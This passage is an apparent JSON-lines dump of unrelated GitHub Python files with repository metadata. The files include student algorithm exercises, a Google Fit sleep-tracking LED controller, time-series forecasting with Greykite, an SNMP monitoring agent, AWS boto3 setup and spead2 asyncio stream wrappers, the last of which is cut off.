coresys.resolution.unsupported\n","repo_name":"home-assistant/supervisor","sub_path":"tests/host/test_network.py","file_name":"test_network.py","file_ext":"py","file_size_in_byte":9086,"program_lang":"python","lang":"en","doc_type":"code","stars":1510,"dataset":"github-code","pt":"3"} +{"seq_id":"29635079585","text":"\"\"\"\r\nCS 2302\r\nEmilio Ramirez\r\nLab 6\r\nDiego Aguirre, Manoj Saha\r\nLast Date Modified: December 14th, 2018\r\nPurpose: Implement Kruskal's Algorithm and Topoligic sort\r\n\"\"\"\r\n\r\n\r\nfrom LAB6sup import topological_sort\r\nfrom Graph_AM import GraphAM\r\n\r\n\r\n\r\ndef main():\r\n\r\n Graph = GraphAM(6, True)\r\n Graph.add_edge(5,2, weight= 1)\r\n Graph.add_edge(2,1, weight= 1)\r\n Graph.add_edge(4,3, weight= 1)\r\n Graph.add_edge(3,2, weight= 1)\r\n Graph.add_edge(3,0, weight= 1) \r\n \r\n print(\"The result of topological sort on the given graph is\", topological_sort(Graph))\r\n\r\nmain()","repo_name":"ejramirez5/lab6a","sub_path":"LAB6.py","file_name":"LAB6.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3310322805","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import UserMixin\nfrom datetime import datetime,timezone,timedelta\nimport calendar, time\nfrom flask import request\nimport json\nimport requests\nimport ast\nfrom . import gFit\nfrom .app import create_app\nfrom .models import db,User\n\napp = create_app()\napp.app_context().push()\n\n####################### calling of refresh token function ###############################\n\ndef new_access_token(refresh_token):\n data = {\n 'grant_type': 'refresh_token',\n 'client_id': os.environ.get('CLIENT_ID'),\n 'client_secret': os.environ.get('CLIENT_SECRET'),\n 'refresh_token': refresh_token\n }\n\n response = requests.post('https://oauth2.googleapis.com/token', data=data)\n # print(response.json())\n resp = response.json()\n new_refresh_token = refresh_token\n if 'refresh_token' in resp:\n new_refresh_token = resp['refresh_token']\n return resp[\"access_token\"] , new_refresh_token\n \n########################end of refresh token functn ##############################\n\ndef toggle_light(nodemcu, state):\n vars = nodemcu['vars']\n vars['LED_STATUS'] = state\n headers = {\n 'Content-Type': 'application/json'\n }\n payload = \"{\\\"LED_STATUS\\\":\"+str(state)+\"}\"\n resp = requests.patch(url=nodemcu['url'], headers=headers, data=payload)\n # print(resp.json())\n return nodemcu\n\ndef send_time(nodemcu,state):\n dt_now1 = datetime.now(tz=timezone(timedelta(hours=5.5)))\n dt_now = dt_now1.strftime(\"%Y-%m-%d %H:%M:%S%z\")\n headers = {\n 'Content-Type': 'application/json'\n }\n payload = \"{\\\"%s\\\":\\\"%s\\\"}\" % (dt_now, state)\n url = \"%s/%s.json\" % (nodemcu['url'][:-5], state)\n resp = requests.patch(url=url, headers=headers, data=payload)\n # print(resp.json())\n\n######################## main_user_functn ###############################\n\n\n\ndef start():\n\n all_user=User.query.all()\n for i in all_user:\n if not i.active:\n continue\n \n try:\n # print(\"i.nodemcu\" , i.nodemcu)\n # print(\"i.token_created_at\" , i.token_created_at)\n # print(\"i.tokens\" , i.tokens)\n # tok = ast.literal_eval(i.tokens)\n # print(\"refresh_token\" , tok[\"refresh_token\"])\n # i.tokens = str(tok)\n # db.session.add(i)\n # db.session.commit()\n # print(\"access_token\" , tok[\"access_token\"])\n # print(\"refresh_token\" , tok[\"refresh_token\"])\n\n # if i.active:\n # continue\n tok = ast.literal_eval(i.tokens)\n ctime = int(calendar.timegm(time.strptime(str(i.token_created_at), '%Y-%m-%d %H:%M:%S.%f')))\n # ctime = int(calendar.timegm((i.token_created_at).utctimetuple()))\n # ctime = (int)((i.token_created_at).timestamp())\n # ctime is in sec\n # if atleat 15 min left to expire\n # print(int(round(time.time())))\n # print(ctime)\n # if i.active:\n # continue\n if int(round(time.time())) - ctime < 2700 :\n # print('access_token not expired')\n access_token = tok[\"access_token\"]\n else :\n # print('getting new access_token')\n access_token, refresh_token = new_access_token(tok[\"refresh_token\"])\n i.token_created_at = datetime.utcnow()\n tok[\"access_token\"] = access_token\n if refresh_token != tok[\"refresh_token\"]:\n tok[\"refresh_token\"] = refresh_token\n\n # print(\"access_token\" , access_token)\n # print(i.token_created_at)\n\n endTimeMillis = int(round(time.time() * 1000))\n startTimeMillis = endTimeMillis - 3600000\n # if gFit.is_sleeping(1584157920000, 1584157920001, access_token):\n if gFit.is_sleeping(startTimeMillis, endTimeMillis, access_token):\n print(\"sleeping\")\n i.nodemcu = str( toggle_light(ast.literal_eval(i.nodemcu), 0) )\n send_time(ast.literal_eval(i.nodemcu), 'sleeping')\n else:\n print(\"Not sleeping\")\n i.nodemcu = str( toggle_light(ast.literal_eval(i.nodemcu), 1) )\n send_time(ast.literal_eval(i.nodemcu), 'awake')\n \n i.tokens = str(tok)\n db.session.add(i)\n db.session.commit()\n\n # except:\n # continue\n except Exception as e:\n print(e)\n \n\nif __name__=='__main__':\n while (True):\n start()\n time.sleep(1800)\n","repo_name":"krishu1501/bettersleep","sub_path":"main/keep_checking.py","file_name":"keep_checking.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33789106875","text":"import sys, itertools\ndata = sys.stdin.read()\n\nfor line in data.splitlines()[1:]:\n i, j, k = line.split(',')\n permutations = list(itertools.permutations(list(i)))\n s = sorted([int(''.join(permutation)) for permutation in permutations])\n num1, num2 = str(s[int(j) - 1]), str(s[int(k) - 1])\n \n length = len(list(i))\n count = 0\n for i in range(length):\n if num1[i] == num2[i]: count += 1\n print(f'{count}A{length - count}B')","repo_name":"rtashklzx47277/Python_practice","sub_path":"NTUB/10622.py","file_name":"10622.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13395541599","text":"import unittest\nfrom fun_with_collections import set_membership as membership\n\n\nclass MyTestCase(unittest.TestCase):\n def test_in_set_true(self): # pass input\n my_set = {1, 2, 3, 4}\n self.assertEqual(membership.in_set(my_set), 'Set is true')\n\n def test_in_set_false(self):\n my_set = {1, 2, 3, 4}\n self.assertNotEqual(membership.in_set(my_set), 'Set is false')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"billster2006/Module7","sub_path":"test_collections/test_set_membership.py","file_name":"test_set_membership.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4146493003","text":"# %%\nimport warnings\nimport os\nfrom collections import defaultdict\n\nimport plotly\nimport pandas as pd\n\nfrom greykite.common.constants import TIME_COL, VALUE_COL\nfrom greykite.framework.benchmark.data_loader_ts import DataLoader\nfrom greykite.framework.input.univariate_time_series import UnivariateTimeSeries\n\nfrom greykite.framework.templates.autogen.forecast_config import \\\n EvaluationPeriodParam, ForecastConfig, \\\n MetadataParam, ModelComponentsParam\n\nfrom greykite.framework.templates.forecaster import Forecaster\nfrom greykite.framework.utils.result_summary import summarize_grid_search_results\n\nwarnings.filterwarnings('ignore')\n\n\n# %%\ndata_loader = DataLoader()\nagg_func = {\n 'count': 'sum'\n}\n\ndf = data_loader.load_bikesharing(\n agg_freq='weekly',\n agg_func=agg_func\n)\n\ndf.drop(df.head(1).index, inplace=True)\ndf.drop(df.tail(1).index, inplace=True)\ndf.reset_index(inplace=True)\n\n# %% \nts = UnivariateTimeSeries()\nts.load_data(\n df=df,\n time_col='ts',\n value_col='count',\n freq='W-MON'\n)\n\nprint(ts.df.head())\n# %%\nfig = ts.plot()\nplotly.io.show(fig)\n\n# %%\nfig = ts.plot_quantiles_and_overlays(\n groupby_time_feature='month',\n show_mean=True,\n show_quantiles=False,\n show_overlays=True,\n center_values=True,\n overlay_label_time_feature='year',\n overlay_style={\n 'line': {\n 'width': 1},\n 'opacity': 0.5\n },\n xlabel='month',\n ylabel=ts.original_value_col,\n title='Yearly seasonality by year'\n)\n\nplotly.io.show(fig)\n# %%\nfig = ts.plot_quantiles_and_overlays(\n groupby_time_feature='woy',\n show_mean=True,\n show_quantiles=False,\n show_overlays=True,\n center_values=True,\n overlay_label_time_feature='year',\n overlay_style={\n 'line': {\n 'width': 1},\n 'opacity': 0.5\n },\n xlabel='week of year',\n ylabel=ts.original_value_col,\n title='Yearly seasonality by year(centered)'\n)\n\nplotly.io.show(fig)\n# %% fit greykite model\nforecast_horizon = 4\ntime_col, value_col = TIME_COL, VALUE_COL\n\nmetadata = MetadataParam(\n time_col=time_col,\n value_col=value_col,\n freq='W-MON'\n)\n\n# %%\ncv_min_train_periods = 52 * 2\n# Let CV use most recent splits for cross validation.\ncv_use_most_recent_splits = True\ncv_max_splits = 6\n\nevaluation_period = EvaluationPeriodParam(\n test_horizon=forecast_horizon,\n cv_horizon=forecast_horizon,\n periods_between_train_test=0,\n cv_min_train_periods=cv_min_train_periods,\n cv_expanding_window=True,\n cv_use_most_recent_splits=cv_use_most_recent_splits,\n cv_periods_between_splits=None,\n cv_periods_between_train_test=0,\n cv_max_splits=cv_max_splits\n)\n\n# %%\n\n\ndef get_model_result_summary(result):\n model = result.model[-1]\n backtest = result.backtest\n grid_search = result.grid_search\n\n # print(model.summary())\n\n cv_results = summarize_grid_search_results(\n grid_search=grid_search,\n decimals=2,\n cv_report_metrics=None,\n column_order=[\n 'rank', 'mean_test', 'split_test', 'mean_train', 'split_train',\n 'mean_fit_time', 'mean_score_time', 'params'\n ]\n )\n\n backtest_eval = defaultdict(list)\n for metric, value in backtest.train_evaluation.items():\n backtest_eval[metric].append(value)\n backtest_eval[metric].append(backtest.test_evaluation[metric])\n metrics = pd.DataFrame(\n backtest_eval,\n index=['train', 'test']\n ).T\n print(f'CV Results:\\n {cv_results.transpose()}')\n print(f'Train/Test evaluation: \\n {metrics}')\n\n return cv_results, metrics\n\n\n# %%\nautoregression = None\nextra_pred_cols = [\n 'ct1', 'ct_sqrt', 'ct1:C(month, levels=list(range(1, 13)))'\n]\n\nseasonality = {\n 'yearly_seasonality': 25,\n 'quarterly_seasonality': 0,\n 'monthly_seasonality': 0,\n 'weekly_seasonality': 0,\n 'daily_seasonality': 0\n}\nchangepoints = {\n 'changepoints_dict': {\n 'method': 'auto',\n 'resample_freq': '7D',\n 'regularization_strength': 0.5,\n 'potential_changepoint_distance': '14D',\n 'no_changepoint_distance_from_end': '60D',\n 'yearly_seasonality_order': 25,\n 'yearly_seasonality_change_freq': None\n },\n 'seasonality_changepoints_dict': None\n}\n\nevents = {\n 'holiday_lookup_countries': []\n}\n\ngrowth = {\n 'growth_term': None\n}\n\ncustom = {\n 'feature_sets_enabled': False,\n 'fit_algorithm_dict': {\n 'fit_algorithm': 'ridge'\n },\n 'extra_pred_cols': extra_pred_cols\n}\n\nmodel_components = ModelComponentsParam(\n seasonality=seasonality,\n changepoints=changepoints,\n events=events,\n growth=growth,\n custom=custom\n)\n\n# %%\nforecast_config = ForecastConfig(\n metadata_param = metadata,\n forecast_horizon=forecast_horizon,\n coverage=0.95,\n evaluation_period_param=evaluation_period,\n model_components_param=model_components\n)\n\nforecaster = Forecaster()\nresult = forecaster.run_forecast_config(\n df=ts.df,\n config=forecast_config\n)\n# %%\nget_model_result_summary(result)\n\n# %%\nfig = result.backtest.plot()\nplotly.io.show(fig)\n\n# %% \nfig = result.forecast.plot()\nplotly.io.show(fig)\n\n# %%\nfig = result.forecast.plot_components()\nplotly.io.show(fig)\n# %%\n","repo_name":"8-u8/learning_Python","sub_path":"greykite_trial/src/greykite_trial.py","file_name":"greykite_trial.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14928776962","text":"import torch\n\nfrom src import _PATH_DATA\n\n\nclass dataset:\n def __init__(self, data, target):\n self.data = data\n self.target = target\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n X = self.data[idx]\n y = self.target[idx]\n\n return X, y\n\n\ndef load_data():\n train_images = torch.load(_PATH_DATA + \"/processed/train_images.pt\")\n train_labels = torch.load(_PATH_DATA + \"/processed/train_labels.pt\")\n test_images = torch.load(_PATH_DATA + \"/processed/test_images.pt\")\n test_labels = torch.load(_PATH_DATA + \"/processed/test_labels.pt\")\n\n return dataset(train_images, train_labels), dataset(test_images, test_labels)\n","repo_name":"RasmusJuul/MLOps_personal","sub_path":"src/data/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"856410656","text":"#Your task is to create a Python script that analyzes the records to calculate each of the following:\n #The total number of months included in the dataset\n #The net total amount of \"Profit/Losses\" over the entire period\n #The average of the changes in \"Profit/Losses\" over the entire period\n #The greatest increase in profits (date and amount) over the entire period\n #The greatest decrease in losses (date and amount) over the entire period\n\n\n# Import dependencies\nimport os\nimport csv\n\n# Define variables\ndate = []\nprofit_loss_changes = []\n\n\ntotal_months = 0\ntotal_net_pl = 0\nprevious_month_pl=0\ncurrent_month_pl=0\nprofit_loss_change=0\n\n# Change directory to the directory of current python script\nos.chdir(os.path.dirname(__file__))\n\n# Path to collect data from the Resources folder\nbudget_data_csv_path = os.path.join(\"Resources\", \"budget_data.csv\")\n\n\n# Open and read csv\nwith open(budget_data_csv_path, newline=\"\") as csvfile:\n\n csv_reader = csv.reader(csvfile, delimiter=\",\")\n \n # Read the header row first\n csv_header = next(csvfile)\n\n for row in csv_reader: \n \n # Count of months\n total_months=total_months + 1\n\n # Calculate net total profit/loss over the time period\n current_month_pl= int(row[1])\n total_net_pl+= current_month_pl\n \n if (total_months==1):\n previous_month_pl=current_month_pl\n continue\n\n else:\n profit_loss_change=current_month_pl-previous_month_pl\n\n #Append each change in profit/loss for each month to profit_loss_changes[] \n profit_loss_changes.append(profit_loss_change)\n\n #Get the current month\"s p/l to be previous month's pl for the next loop\n previous_month_pl=current_month_pl\n\n #Append each month to total months to find out the month of greatest profit and loss\n date.append(row[0])\n\n #Calculate total monhtly changes of p/l and get the average of it\n total_profit_loss_changes=sum(profit_loss_changes)\n avarage_monthly_pl_changes=round(total_profit_loss_changes/(total_months-1),2)\n\n #Greatest change in profits and greatest change in losses over the time period\n greatest_increase=max(profit_loss_changes)\n greatest_decrease=min(profit_loss_changes)\n\n #Find out the date of the greatest change in profits and greatest decrease in losses\n date_greatest_increase=date[profit_loss_changes.index(greatest_increase)]\n date_greatest_decrease=date[profit_loss_changes.index(greatest_decrease)]\n\n \n \n\n# -->> Print the analysis to the terminal\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: ${total_net_pl}\")\nprint(f\"Average Change: ${avarage_monthly_pl_changes}\")\nprint(f\"Greatest Increase in Profits: {date_greatest_increase} (${greatest_increase})\")\nprint(f\"Greatest Decreasde in Losses: {date_greatest_decrease} (${greatest_decrease})\")\n\n\n#Export a text file with the results\n\nwith open (\"financial_analysis.text\", \"w\") as text:\n\n text.write(\"Financial Analysis\\n\")\n text.write(\"----------------------------------\\n\")\n text.write(f\"Total Months: {total_months}\\n\")\n text.write(f\"Total: ${total_net_pl}\\n\")\n text.write(f\"Average Change: ${avarage_monthly_pl_changes}\\n\")\n text.write(f\"Greatest Increase in Profits: {date_greatest_increase} (${greatest_increase})\\n\")\n text.write(f\"Greatest Decreasde in Losses: {date_greatest_decrease} (${greatest_decrease})\\n\")\n\n","repo_name":"Serapbasaran/python-challenge","sub_path":"Pybank/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10782623636","text":"#!/usr/bin/python\r\n# _*_ coding:utf-8 _*_\r\n__author__ = \"dqz\"\r\n#让用户输入的备份的路径和存放的路径\r\nyuan = input(\"请输入备份的路径:\")\r\nmubiao = input(\"请输入目标路径:\")\r\n\r\n#定义个函数\r\ndef bf(x,y):\r\n s = open(yuan,'r')\r\n d = open(mubiao,'w')\r\n for i in s:\r\n d.write(i)\r\n d.flush()\r\n s.close()\r\n d.close()\r\n\r\n#调用函数\r\nbf(x=yuan,y=mubiao)\r\n","repo_name":"dqzboy/PyScript","sub_path":"文件拷贝.py","file_name":"文件拷贝.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"31221407563","text":"#!/usr/bin/env python\n\nfrom lib.config import AppConfig\nfrom lib.snmp import SNMP\nimport logging\n\nimport socket\nimport requests\nimport json\nimport traceback\n\n\ndef get_microtic(snmp, data):\n data[\"distribution\"] = \"RouterOS\"\n data[\"version\"] = snmp.get(\"1.3.6.1.4.1.14988.1.1.4.4.0\")\n\n\nvendor_specific = {\n \"1.3.6.1.4.1.14988.1\": get_microtic\n}\n\n\ndef try_device(conf, log, device):\n try:\n log.info(\"Querying %s.\" % (device[\"hostname\"], ))\n\n snmp = SNMP(device[\"version\"], device[\"community\"], device[\"hostname\"], int(device[\"port\"]))\n\n data = {\n \"id\": device[\"id\"],\n \"hostname\": snmp.get(\"1.3.6.1.2.1.1.5.0\"),\n \"kernel\": snmp.get(\"1.3.6.1.2.1.1.1.0\"),\n \"uptime\": snmp.get(\"1.3.6.1.2.1.1.3.0\") / 100,\n }\n\n vendor = snmp.get(\"1.3.6.1.2.1.1.2.0\")\n\n if vendor in vendor_specific:\n vendor_specific[vendor](snmp, data)\n\n r = requests.put(\"%s/collect.php\" % (conf.get(\"server_address\"), ), data=json.dumps(data), verify=conf.get(\"server_verify_ssl\", True))\n\n if r.status_code != 200:\n log.error(r.text)\n else:\n log.debug(r.text)\n\n except Exception as e:\n log.error(str(e))\n log.debug(traceback.format_exc())\n\n\ndef main():\n conf = AppConfig([\n (\"server_address\", str, \"Address of SYSmon server.\"),\n (\"server_verify_ssl\", bool, \"Verify SYSmon server's SSL certificate?\")\n ])\n\n log = logging.getLogger()\n log.info(\"SYSmon SNMP agent is starting.\")\n\n try:\n server_address = conf.get(\"server_address\")\n if server_address is None:\n raise Exception(\"No server address configured.\")\n\n hostname = socket.gethostname()\n url = \"%shosts/list/%s\" % (server_address, hostname)\n r = requests.get(url, verify=conf.get(\"server_verify_ssl\", True))\n devices = json.loads(r.text)\n\n for device in devices:\n try_device(conf, log, device)\n\n except Exception as e:\n log.error(str(e))\n log.debug(traceback.format_exc())\n\n log.info(\"SYSmon SNMP agent finished.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"niximor/sysmon","sub_path":"collector/src/sysmon-snmp.py","file_name":"sysmon-snmp.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6310197267","text":"def add(i):\n global last\n last += 1\n heap[last] = i\n a = last\n while a // 2:\n if heap[a] < heap[a // 2]:\n heap[a], heap[a // 2] = heap[a // 2], heap[a]\n a = a // 2\n else:\n break\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n arr = list(map(int, input().split()))\n heap = [0] * (N + 1)\n last = 0\n for i in arr:\n add(i)\n x = N // 2\n summ = 0\n while x:\n summ += heap[x]\n x //= 2\n print(f'#{tc} {summ}')","repo_name":"judong93/TIL","sub_path":"algorithm/0824~/0826/이진힙.py","file_name":"이진힙.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24658291923","text":"from .is_a_function import isAFunction\nfrom .is_a_number import isANumber\nfrom .is_a_numpy_array import isANumpyArray\nfrom .is_a_pandas_dataframe import isAPandasDataFrame\nfrom .is_a_pandas_series import isAPandasSeries\nfrom .is_a_tensor import isATensor\n\n\ndef dropNaN(x):\n if isATensor(x):\n if isAPandasDataFrame(x) or isAPandasSeries(x):\n x = x.values.tolist()\n\n if isANumpyArray(x):\n x = x.tolist()\n\n out = []\n\n for value in x:\n temp = dropNaN(value)\n\n if temp is not None:\n out.append(temp)\n\n return out\n\n elif type(x) == dict:\n out = {}\n\n for key in x.keys():\n value = x[key]\n temp = dropNaN(value)\n\n if temp is not None:\n out[key] = temp\n\n return out\n\n else:\n if isAFunction(x):\n return None\n\n try:\n return dropNaN(x.__dict__)\n\n except:\n pass\n\n if isANumber(x):\n return x\n\n return None\n\n","repo_name":"jrc03c/pyds","sub_path":"pyds/drop_nan.py","file_name":"drop_nan.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31139559007","text":"from random import randint\n\nclass Solution(object):\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n self.sort(nums,0,len(nums)-1)\n return nums[k-1]\n \n def sort(self, nums,left,right):\n if left < right:\n pivot = self.partition(nums, left, right)\n self.sort(nums,left,pivot-1)\n self.sort(nums,pivot+1,right)\n \n def partition(self, nums, left, right):\n pivot = randint(left, right)\n nums[left], nums[pivot] = nums[pivot], nums[left]\n i = left+1\n pivot = nums[left]\n \n for j in range(left+1, right+1):\n if nums[j] > pivot:\n nums[j], nums[i] = nums[i], nums[j]\n i+=1\n \n position = i-1\n nums[left],nums[position] = nums[position],nums[left]\n \n return position\n ","repo_name":"jw122/exercises","sub_path":"sorting-searching/kth-largest-element-in-an-array.py","file_name":"kth-largest-element-in-an-array.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18669144027","text":"import yaml\nfrom boto3 import resource as botorsc\nfrom boto3 import client as botoclient\n\n\nwith open('../credentials.yml', 'r') as cfile:\n cfg = yaml.safe_load(cfile)\n\naws_region = cfg['aws_region']\naws_key = cfg['aws_key']\naws_access = cfg['aws_access']\ndepartments: list = ['dev', 'test', 'srt']\n\n# Create Client for DynamoDB\ndynamo_client = botoclient(\n 'dynamodb',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n\n# Create Resource for DynamoDB\ndynamo_rsc = botorsc(\n 'dynamodb',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n\n# Create Client for S3\ns3_client = botoclient(\n 's3',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n\n# Create Resource for S3\ns3_rsc = botorsc(\n 's3',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n","repo_name":"n-raghu/aws-nuggets","sub_path":"s3-lambda/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33099302103","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nN_GROUPS = 3\nGROUP_DATA_FILE_FORMAT = 'grpdata%i.csv'\nVALID_DATA_COLUMN = 1\n\ngroup_means = np.full(N_GROUPS, np.nan)\nfor i_group in range(N_GROUPS):\n file_name = GROUP_DATA_FILE_FORMAT % i_group\n all_group_data = np.loadtxt(file_name, delimiter=',')\n group_data = all_group_data[:, VALID_DATA_COLUMN]\n group_means[i_group] = np.mean(group_data)\n\nplt.plot(group_means)\nplt.xlabel('Group')\nplt.ylabel('Mean value')\nplt.show()","repo_name":"gmarkkula/ResearchCodingWorkshop","sub_path":"code examples/my_script_3.py","file_name":"my_script_3.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2085872372","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 31 14:40:14 2021\n\n@author: md703\n\"\"\"\n\nfrom mcx_ultrasound_model import MCX\n\n# parameters\nsessionID = \"test_bc_eric_smallijv_mus_lb\"\n\n# initialize\nsimulator = MCX(sessionID)\n\n# run forward mcx\nsimulator.run()","repo_name":"syuys/ijv_2","sub_path":"20211026_newmodel_size_test/run_baseline_simulation.py","file_name":"run_baseline_simulation.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14069744369","text":"import asyncio\n\n\nfrom spead2._spead2.send import UdpStreamAsyncio as _UdpStreamAsyncio\nfrom spead2._spead2.send import TcpStreamAsyncio as _TcpStreamAsyncio\nfrom spead2._spead2.send import InprocStreamAsyncio as _InprocStreamAsyncio\n\n\ndef _wrap_class(name, base_class):\n class Wrapped(base_class):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._active = 0\n self._last_queued_future = None\n\n def _async_send(self, call):\n future = asyncio.Future()\n loop = asyncio.get_event_loop()\n\n def callback(exc, bytes_transferred):\n if exc is not None:\n future.set_exception(exc)\n else:\n future.set_result(bytes_transferred)\n self._active -= 1\n if self._active == 0:\n loop.remove_reader(self.fd)\n self._last_queued_future = None # Purely to free the memory\n queued = call(callback)\n if self._active == 0:\n loop.add_reader(self.fd, self.process_callbacks)\n self._active += 1\n if queued:\n self._last_queued_future = future\n return future\n\n def async_send_heap(self, heap, cnt=-1, substream_index=0):\n \"\"\"Send a heap asynchronously. Note that this is *not* a coroutine:\n it returns a future. Adding the heap to the queue is done\n synchronously, to ensure proper ordering.\n\n Parameters\n ----------\n heap : :py:class:`spead2.send.Heap`\n Heap to send\n cnt : int, optional\n Heap cnt to send (defaults to auto-incrementing)\n substream_index : int, optional\n Substream on which to send the heap\n \"\"\"\n meth = super().async_send_heap\n return self._async_send(\n lambda callback: meth(heap, callback, cnt, substream_index))\n\n def async_send_heaps(self, heaps, mode):\n meth = super().async_send_heaps\n return self._async_send(\n lambda callback: meth(heaps, callback, mode))\n\n async def async_flush(self):\n \"\"\"Asynchronously wait for all enqueued heaps to be sent. Note that\n this only waits for heaps passed to :meth:`async_send_heap` prior to\n this call, not ones added while waiting.\"\"\"\n future = self._last_queued_future\n if future is not None:\n await asyncio.wait([future])\n\n Wrapped.__name__ = name\n return Wrapped\n\n\nUdpStream = _wrap_class('UdpStream', _UdpStreamAsyncio)\nUdpStream.__doc__ = \\\n \"\"\"SPEAD over UDP with asynchronous sends. The other constructors\n defined for :py:class:`spead2.send.UdpStream` are also applicable here.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n endpoints : List[Tuple[str, int]]\n Peer endpoints (one per substreams).\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n buffer_size : int\n Socket buffer size. A warning is logged if this size cannot be set due\n to OS limits.\n \"\"\"\n\n_TcpStreamBase = _wrap_class('TcpStream', _TcpStreamAsyncio)\n\n\nclass TcpStream(_TcpStreamBase):\n \"\"\"SPEAD over TCP with asynchronous connect and sends.\n\n Most users will use :py:meth:`connect` to asynchronously create a stream.\n The constructor should only be used if you wish to provide your own socket\n and take care of connecting yourself.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n socket : :py:class:`socket.socket`\n TCP/IP Socket that is already connected to the remote end\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n \"\"\"\n\n @classmethod\n async def connect(cls, *args, **kwargs):\n \"\"\"Open a connection.\n\n The arguments are the same as for the constructor of\n :py:class:`spead2.send.TcpStream`.\n \"\"\"\n future = asyncio.Future()\n loop = asyncio.get_event_loop()\n\n def callback(arg):\n if not future.done():\n if isinstance(arg, Exception):\n loop.call_soon_threadsafe(future.set_exception, arg)\n else:\n loop.call_soon_threadsafe(future.set_result, arg)\n\n stream = cls(callback, *args, **kwargs)\n await future\n return stream\n\n\nInprocStream = _wrap_class('InprocStream', _InprocStreamAsyncio)\nInprocStream.__doc__ = \\\n \"\"\"SPEAD over reliable in-process transport.\n\n .. note::\n\n Data may still be lost if the maximum number of in-flight heaps (set\n in the stream config) is exceeded. Either set this value to more\n heaps than will ever be sent (which will use unbounded memory) or be\n sure to block on the futures returned before exceeding the capacity.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n queues : List[:py:class:`spead2.InprocQueue`]\n Queue holding the data in flight\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n \"\"\"\n\ntry:\n from spead2._spead2.send import UdpIbvStreamAsyncio as _UdpIbvStreamAsyncio\n\n UdpIbvStream = _wrap_class('UdpIbvStream', _UdpIbvStreamAsyncio)\n UdpIbvStream.__doc__ = \\\n \"\"\"Like :class:`UdpStream`, but using the Infiniband Verbs API.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n endpoints : List[Tuple[str, int]]\n Destinations to transmit to. For backwards compatibility, one can\n also provide a single address and port as two separate\n parameters.\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n interface_address : str\n IP address of network interface from which to send\n buffer_size : int, optional\n Buffer size\n ttl : int, optional\n Time-To-Live of packets\n comp_vector : int, optional\n Completion channel vector (interrupt)\n for asynchronous operation, or\n a negative value to poll continuously. Polling\n should not be used if there are other users of the\n thread pool. If a non-negative value is provided, it\n is taken modulo the number of available completion\n vectors. This allows a number of readers to be\n assigned sequential completion vectors and have them\n load-balanced, without concern for the number\n available.\n max_poll : int\n Maximum number of times to poll in a row, without\n waiting for an interrupt (if `comp_vector` is\n non-negative) or letting other code run on the\n thread (if `comp_vector` is negative).\n \"\"\"\n\nexcept ImportError:\n 